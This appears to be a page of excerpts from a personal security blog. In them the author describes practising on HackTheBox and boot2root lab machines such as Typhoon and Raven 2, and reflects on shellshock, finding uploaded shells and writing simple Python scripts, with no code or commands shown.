Lately, I've been playing around on HackTheBox to expand my game.  I find the platform to be challenging because the Capture the Flag style hacking is another world to me.  I frequently see people writing "this is easy" when referring to a specific box or challenge but I think it's only easy if you know how to do "something".  For example, I know next to nothing about steganography and when I came across an image with a hidden message, I had no idea what tool to use for the problem.  But then you discover a tool like steghide and all of the sudden, it IS "easy" -- as they say.  Moving on....

    I've been working my way through some of the easier boxes in both the Active and Retired section and my recent project is tenten which is when I came across the WordPress Job-Manager vulnerability.  I've said this previously, I'm a Python n00b but I learn from doing.  This seemed like a great opportunity because I needed to parse through a bunch of pages -- grabbing the title from each page.  Essentially, at this point in the process of working my way through this box, I'm trying to find my uploaded shell.

    The description of Typhoon 1.02 makes it very clear that this box is extremely vulnerable on multiple fronts.  I didn't set out to find every avenue and I'm sure I did not.  As I'm reading the description again, I clearly didn't even touch DNS.  That being said, I found more than a few low privilege entry points and multiple privilege escalations. 

    Two things I really like about this box --

    1.  I got to play with a few things that I'd not seen previously.
    2.  This box, like the metasploitable series, is good to come back to from time to time after learning new tricks.  Clearly I need to learn some new DNS exploitation techniques.  

    As soon as I scanned this box, I knew my entry point.  What's the first rule of Fight Club?  You don't talk about Fight Club.  So I won't say where I got my first experience with a similar box but James and I are quite familiar with each other.  

    In the description, it's mentioned that it was formerly on HackTheBox.  I've played on HackTheBox, pulled my hair out working on HTB boxes, and this seems like an easy box for HTB.  Or maybe it's hard and the entry was known to me.  I digress.

    The scanner comes back with:  "Site appears vulnerable to the 'shellshock' vulnerability ("

    I realize I'm talking about a four year old vulnerability but it's one that still exists and it's a rabbit hole I wanted to jump into.  I've come across this vulnerability a few times in the past and I've either used Metasploit or ("Apache mod_cgi - 'Shellshock' Remote Command Injection") to get my shell.  I seem to recall having an issue with one or both at some point and I moved on to another avenue because my search results yielded bits and pieces but nothing that I could wrap my hands around.

    Stumbling upon this vulnerability recently, I paused to dig into it with the intention of getting a better understanding for manual exploitation.

    The description:  "Raven 2 is an intermediate level boot2root VM. There are four flags to capture. After multiple breaches, Raven Security has taken extra steps to harden their web server to prevent hackers from getting in. Can you still breach Raven?"  

    I wasn't hunting flags but I found three of the four -- maybe I found one more but I don't remember because I wasn't looking.  

    This was a fun machine.  Admittedly, I got hung up on the initial shell for longer than I should have but I knew it was my entry and I just had to get the syntax correctly.  Before I get ahead of myself too much, we start off with our scan:

    Does anyone actually write their own shells?  At some point, a few people did but now we just search for the type of shell we want and we find what we need.  Kali has quite a few under /usr/share/webshells and is another good resource. 

    Why reinvent the wheel shell when there are so many at our disposal?   To better understand the code we’re reading and writing.

    At best, I hack code.  I’ll never be fluent in Python because there are too many other things to learn but that doesn’t stop me from writing simple scripts.  The more baby scripts I write, the better I can understand what I’m reading when I’m looking at other code. 

    © 2020